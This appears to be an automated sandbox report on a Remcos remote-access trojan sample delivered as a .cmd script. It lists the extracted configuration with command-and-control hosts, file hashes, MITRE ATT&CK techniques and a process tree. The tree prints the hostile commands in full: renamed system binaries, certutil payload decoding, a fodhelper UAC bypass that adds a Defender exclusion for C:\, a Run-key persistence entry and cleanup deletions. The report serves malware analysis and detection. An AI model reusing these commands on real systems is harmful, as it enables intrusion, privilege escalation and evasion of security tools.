remcos | ef227a4256686de1fd81f9494ad29f25c698ba837c1781014537374cc333f022

Analysis

max time kernel
149s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
17-05-2024 02:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ef227a4256686de1fd81f9494ad29f25c698ba837c1781014537374cc333f022.cmd
Size

3.2MB
MD5

f09fcd4720339bb3092fe8b0e0c9f631
SHA1

56afd26c5a724a87ce8d3648213a6ff2adcc10a9
SHA256

ef227a4256686de1fd81f9494ad29f25c698ba837c1781014537374cc333f022
SHA512

6304df118b808c2334248c14184cfad98a0ccb3931cb7876c718f328af5093c65c8b71e10ae73fc8b8dd8868ffe73c4e6ca1e2f327cb85cf5c385accc6aadcdd
SSDEEP

24576:rSyi8cqIjNCrvFt5YjM8JfKlt/6azwC2ig407jFudT1omd4pig5j+RCNJXCP+pp:rSyTn2g51/6Zigt74omdu3p

Score

10^/10

remcos remotehost persistence rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

myumysmeetr.ddns.net:2404

mysweeterbk.ddns.net:2404

meetre1ms.freeddns.org:2404

bbhmeetre1ms.freeddns.org:2404

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-TPT9X3
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) 15 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1652-86-0x000000001BCB0000-0x000000001BD32000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral2/memory/1652-87-0x000000001BCB0000-0x000000001BD32000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral2/memory/1652-83-0x000000001BCB0000-0x000000001BD32000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral2/memory/1652-88-0x000000001BCB0000-0x000000001BD32000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral2/memory/1652-89-0x000000001BCB0000-0x000000001BD32000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral2/memory/1652-90-0x000000001BCB0000-0x000000001BD32000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral2/memory/1652-91-0x000000001BCB0000-0x000000001BD32000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral2/memory/1652-93-0x000000001BCB0000-0x000000001BD32000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral2/memory/1652-98-0x000000001BCB0000-0x000000001BD32000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral2/memory/1652-99-0x000000001BCB0000-0x000000001BD32000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral2/memory/1652-106-0x000000001BCB0000-0x000000001BD32000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral2/memory/1652-115-0x000000001BCB0000-0x000000001BD32000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral2/memory/1652-114-0x000000001BCB0000-0x000000001BD32000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral2/memory/1652-122-0x000000001BCB0000-0x000000001BD32000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral2/memory/1652-123-0x000000001BCB0000-0x000000001BD32000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

per.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation per.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	per.exe

Executes dropped EXE 25 IoCs

Processes:

alpha.exealpha.exealpha.exealpha.exekn.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exeger.exealpha.exekn.exeper.exealpha.exePing_c.pifalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exe

pid	process
1760	alpha.exe
1064	alpha.exe
4936	alpha.exe
2568	alpha.exe
2644	kn.exe
1748	alpha.exe
928	alpha.exe
3568	alpha.exe
1652	alpha.exe
2304	xkn.exe
3916	alpha.exe
3152	ger.exe
2076	alpha.exe
2484	kn.exe
3496	per.exe
3808	alpha.exe
4520	Ping_c.pif
5068	alpha.exe
4940	alpha.exe
3940	alpha.exe
372	alpha.exe
3916	alpha.exe
440	alpha.exe
1956	alpha.exe
1652	alpha.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Ping_c.pif

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Duchpovs = "C:\\Users\\Public\\Duchpovs.url"	Ping_c.pif

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

30 drive.google.com
32 drive.google.com
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

3092 taskkill.exe

flow	ioc
30	drive.google.com
32	drive.google.com

pid	process
3092	taskkill.exe

Modifies registry class 5 IoCs

Processes:

ger.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\ms-settings\shell\open\command	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\ms-settings	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\ms-settings\shell	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\ms-settings\shell\open	ger.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\""	ger.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	32	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	34	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

xkn.exePing_c.pif

pid process

2304 xkn.exe
2304 xkn.exe
4520 Ping_c.pif
4520 Ping_c.pif
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

xkn.exetaskkill.exe

description pid process

Token: SeDebugPrivilege 2304 xkn.exe
Token: SeDebugPrivilege 3092 taskkill.exe

pid	process
2304	xkn.exe
2304	xkn.exe
4520	Ping_c.pif
4520	Ping_c.pif

description	pid	process
Token: SeDebugPrivilege	2304	xkn.exe
Token: SeDebugPrivilege	3092	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exePing_c.pif

description	pid	process	target process
PID 4364 wrote to memory of 5044	4364	cmd.exe	extrac32.exe
PID 4364 wrote to memory of 5044	4364	cmd.exe	extrac32.exe
PID 4364 wrote to memory of 1760	4364	cmd.exe	alpha.exe
PID 4364 wrote to memory of 1760	4364	cmd.exe	alpha.exe
PID 4364 wrote to memory of 1064	4364	cmd.exe	alpha.exe
PID 4364 wrote to memory of 1064	4364	cmd.exe	alpha.exe
PID 4364 wrote to memory of 4936	4364	cmd.exe	alpha.exe
PID 4364 wrote to memory of 4936	4364	cmd.exe	alpha.exe
PID 4936 wrote to memory of 4156	4936	alpha.exe	extrac32.exe
PID 4936 wrote to memory of 4156	4936	alpha.exe	extrac32.exe
PID 4364 wrote to memory of 2568	4364	cmd.exe	alpha.exe
PID 4364 wrote to memory of 2568	4364	cmd.exe	alpha.exe
PID 2568 wrote to memory of 2644	2568	alpha.exe	kn.exe
PID 2568 wrote to memory of 2644	2568	alpha.exe	kn.exe
PID 4364 wrote to memory of 1748	4364	cmd.exe	alpha.exe
PID 4364 wrote to memory of 1748	4364	cmd.exe	alpha.exe
PID 1748 wrote to memory of 3996	1748	alpha.exe	extrac32.exe
PID 1748 wrote to memory of 3996	1748	alpha.exe	extrac32.exe
PID 4364 wrote to memory of 928	4364	cmd.exe	alpha.exe
PID 4364 wrote to memory of 928	4364	cmd.exe	alpha.exe
PID 928 wrote to memory of 2860	928	alpha.exe	extrac32.exe
PID 928 wrote to memory of 2860	928	alpha.exe	extrac32.exe
PID 4364 wrote to memory of 3568	4364	cmd.exe	alpha.exe
PID 4364 wrote to memory of 3568	4364	cmd.exe	alpha.exe
PID 3568 wrote to memory of 880	3568	alpha.exe	extrac32.exe
PID 3568 wrote to memory of 880	3568	alpha.exe	extrac32.exe
PID 4364 wrote to memory of 1652	4364	cmd.exe	alpha.exe
PID 4364 wrote to memory of 1652	4364	cmd.exe	alpha.exe
PID 1652 wrote to memory of 2304	1652	alpha.exe	xkn.exe
PID 1652 wrote to memory of 2304	1652	alpha.exe	xkn.exe
PID 2304 wrote to memory of 3916	2304	xkn.exe	alpha.exe
PID 2304 wrote to memory of 3916	2304	xkn.exe	alpha.exe
PID 3916 wrote to memory of 3152	3916	alpha.exe	ger.exe
PID 3916 wrote to memory of 3152	3916	alpha.exe	ger.exe
PID 4364 wrote to memory of 2076	4364	cmd.exe	alpha.exe
PID 4364 wrote to memory of 2076	4364	cmd.exe	alpha.exe
PID 2076 wrote to memory of 2484	2076	alpha.exe	kn.exe
PID 2076 wrote to memory of 2484	2076	alpha.exe	kn.exe
PID 4364 wrote to memory of 3496	4364	cmd.exe	per.exe
PID 4364 wrote to memory of 3496	4364	cmd.exe	per.exe
PID 4364 wrote to memory of 3808	4364	cmd.exe	alpha.exe
PID 4364 wrote to memory of 3808	4364	cmd.exe	alpha.exe
PID 3808 wrote to memory of 3092	3808	alpha.exe	taskkill.exe
PID 3808 wrote to memory of 3092	3808	alpha.exe	taskkill.exe
PID 4364 wrote to memory of 4520	4364	cmd.exe	Ping_c.pif
PID 4364 wrote to memory of 4520	4364	cmd.exe	Ping_c.pif
PID 4364 wrote to memory of 4520	4364	cmd.exe	Ping_c.pif
PID 4364 wrote to memory of 5068	4364	cmd.exe	alpha.exe
PID 4364 wrote to memory of 5068	4364	cmd.exe	alpha.exe
PID 4364 wrote to memory of 4940	4364	cmd.exe	alpha.exe
PID 4364 wrote to memory of 4940	4364	cmd.exe	alpha.exe
PID 4364 wrote to memory of 3940	4364	cmd.exe	alpha.exe
PID 4364 wrote to memory of 3940	4364	cmd.exe	alpha.exe
PID 4364 wrote to memory of 372	4364	cmd.exe	alpha.exe
PID 4364 wrote to memory of 372	4364	cmd.exe	alpha.exe
PID 4364 wrote to memory of 3916	4364	cmd.exe	alpha.exe
PID 4364 wrote to memory of 3916	4364	cmd.exe	alpha.exe
PID 4364 wrote to memory of 440	4364	cmd.exe	alpha.exe
PID 4364 wrote to memory of 440	4364	cmd.exe	alpha.exe
PID 4364 wrote to memory of 1956	4364	cmd.exe	alpha.exe
PID 4364 wrote to memory of 1956	4364	cmd.exe	alpha.exe
PID 4364 wrote to memory of 1652	4364	cmd.exe	alpha.exe
PID 4364 wrote to memory of 1652	4364	cmd.exe	alpha.exe
PID 4520 wrote to memory of 4524	4520	Ping_c.pif	extrac32.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ef227a4256686de1fd81f9494ad29f25c698ba837c1781014537374cc333f022.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:4364
- C:\Windows\System32\extrac32.exe
  C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
  2⤵
  PID:5044
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
  2⤵
  - Executes dropped EXE
  PID:1760
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
  2⤵
  - Executes dropped EXE
  PID:1064
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4936
- - C:\Windows\system32\extrac32.exe
    extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
    3⤵
    PID:4156
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\ef227a4256686de1fd81f9494ad29f25c698ba837c1781014537374cc333f022.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2568
- - C:\Users\Public\kn.exe
    C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\ef227a4256686de1fd81f9494ad29f25c698ba837c1781014537374cc333f022.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
    3⤵
    - Executes dropped EXE
    PID:2644
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1748
- - C:\Windows\system32\extrac32.exe
    extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
    3⤵
    PID:3996
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:928
- - C:\Windows\system32\extrac32.exe
    extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
    3⤵
    PID:2860
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3568
- - C:\Windows\system32\extrac32.exe
    extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
    3⤵
    PID:880
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1652
- - C:\Users\Public\xkn.exe
    C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2304
  - - C:\Users\Public\alpha.exe
      "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3916
    - - C:\Users\Public\ger.exe
        
        C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
        5⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:3152
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2076
- - C:\Users\Public\kn.exe
    C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
    3⤵
    - Executes dropped EXE
    PID:2484
- C:\Windows \System32\per.exe
  "C:\\Windows \\System32\\per.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:3496
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3808
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM SystemSettings.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3092
- C:\Users\Public\Libraries\Ping_c.pif
  C:\Users\Public\Libraries\Ping_c.pif
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4520
- - C:\Windows\SysWOW64\extrac32.exe
    C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Ping_c.pif C:\\Users\\Public\\Libraries\\Duchpovs.PIF
    3⤵
    PID:4524
- - C:\Windows\SysWOW64\colorcpl.exe
    C:\Windows\System32\colorcpl.exe
    3⤵
    PID:1652
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
  2⤵
  - Executes dropped EXE
  PID:5068
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
  2⤵
  - Executes dropped EXE
  PID:4940
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
  2⤵
  - Executes dropped EXE
  PID:3940
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:372
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:3916
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:440
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:1956
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:1652

C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
1⤵
PID:3276

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4612,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=4432 /prefetch:8
1⤵
PID:2836

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
d5bf14d7a0720525da5662f2a3d7f68c

SHA1
577b451ea85078f838c85dc8e04dc8cf2192c3db

SHA256
fb936722ad09013d9730a9c0ac7a0f8eb3730b64c807dfdda9e6a91e676e0331

SHA512
99a510467b5e92fd59437b98d27b730e94a372ca2dc946c5775bff78b41973f776e7bbf88249fbc563f8dbb0135be90c74807150a2e9193afbbc02b587b35b4a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ambylmtg.lvj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\Libraries\Ping_c.pif

Filesize
1.1MB

MD5
33bbd27a00b4160a844a7edf2efef84e

SHA1
c3f19d22898b690d4c98c59416c62ec6e54a39de

SHA256
2c49f89d2a461bb32f9c50f8b37fb53b0f86294d4f03fb3e08588e979329fb45

SHA512
d4628cdae15273dc0863afa06153d202d8a61ed8d0f9e213c47f029016b81cad7d2d4dc3c115aefbff9c9d0ba6d74e3aa89f09d5fd6226eaa597f0e0328415b7

Download Submit
C:\Users\Public\Ping_c.mp4

Filesize
2.2MB

MD5
4ea05e6097590a5d2eac1ba0ada0a2fa

SHA1
63bb037ad57358d6931cccbc8a37c6bdeddcb497

SHA256
8457b155358dd52b872245248bb8e3dfaa275cae2537e35520514b0a81833320

SHA512
9103b62fbbba7e3b6304d50f6409bae14be2e4791d2d22b5b0d8181a269c686a56d8c269b48e194d414883e433965d91f22caa5035f0a539bfb441fa301d1a84

Download Submit
C:\Users\Public\alpha.exe

Filesize
283KB

MD5
8a2122e8162dbef04694b9c3e0b6cdee

SHA1
f1efb0fddc156e4c61c5f78a54700e4e7984d55d

SHA256
b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

SHA512
99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

Download Submit
C:\Users\Public\ger.exe

Filesize
75KB

MD5
227f63e1d9008b36bdbcc4b397780be4

SHA1
c0db341defa8ef40c03ed769a9001d600e0f4dae

SHA256
c0e25b1f9b22de445298c1e96ddfcead265ca030fa6626f61a4a4786cc4a3b7d

SHA512
101907b994d828c83587c483b4984f36caf728b766cb7a417b549852a6207e2a3fe9edc8eff5eeab13e32c4cf1417a3adccc089023114ea81974c5e6b355fed9

Download Submit
C:\Users\Public\kn.exe

Filesize
1.6MB

MD5
bd8d9943a9b1def98eb83e0fa48796c2

SHA1
70e89852f023ab7cde0173eda1208dbb580f1e4f

SHA256
8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2

SHA512
95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

Download Submit
C:\Users\Public\xkn.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows \System32\per.exe

Filesize
48KB

MD5
85018be1fd913656bc9ff541f017eacd

SHA1
26d7407931b713e0f0fa8b872feecdb3cf49065a

SHA256
c546e05d705ffdd5e1e18d40e2e7397f186a7c47fa5fc21f234222d057227cf5

SHA512
3e5903cf18386951c015ae23dd68a112b2f4b0968212323218c49f8413b6d508283cc6aaa929dbead853bd100adc18bf497479963dad42dfafbeb081c9035459

Download Submit
memory/1652-83-0x000000001BCB0000-0x000000001BD32000-memory.dmp

Filesize
520KB

Download
memory/1652-93-0x000000001BCB0000-0x000000001BD32000-memory.dmp

Filesize
520KB

Download
memory/1652-87-0x000000001BCB0000-0x000000001BD32000-memory.dmp

Filesize
520KB

Download
memory/1652-123-0x000000001BCB0000-0x000000001BD32000-memory.dmp

Filesize
520KB

Download
memory/1652-88-0x000000001BCB0000-0x000000001BD32000-memory.dmp

Filesize
520KB

Download
memory/1652-81-0x0000000003F30000-0x0000000004F30000-memory.dmp

Filesize
16.0MB

Download
memory/1652-89-0x000000001BCB0000-0x000000001BD32000-memory.dmp

Filesize
520KB

Download
memory/1652-90-0x000000001BCB0000-0x000000001BD32000-memory.dmp

Filesize
520KB

Download
memory/1652-91-0x000000001BCB0000-0x000000001BD32000-memory.dmp

Filesize
520KB

Download
memory/1652-86-0x000000001BCB0000-0x000000001BD32000-memory.dmp

Filesize
520KB

Download
memory/1652-98-0x000000001BCB0000-0x000000001BD32000-memory.dmp

Filesize
520KB

Download
memory/1652-99-0x000000001BCB0000-0x000000001BD32000-memory.dmp

Filesize
520KB

Download
memory/1652-122-0x000000001BCB0000-0x000000001BD32000-memory.dmp

Filesize
520KB

Download
memory/1652-106-0x000000001BCB0000-0x000000001BD32000-memory.dmp

Filesize
520KB

Download
memory/1652-115-0x000000001BCB0000-0x000000001BD32000-memory.dmp

Filesize
520KB

Download
memory/1652-114-0x000000001BCB0000-0x000000001BD32000-memory.dmp

Filesize
520KB

Download
memory/2304-45-0x000002933A900000-0x000002933A922000-memory.dmp

Filesize
136KB

Download
memory/4520-75-0x0000000000400000-0x000000000051D000-memory.dmp

Filesize
1.1MB

Download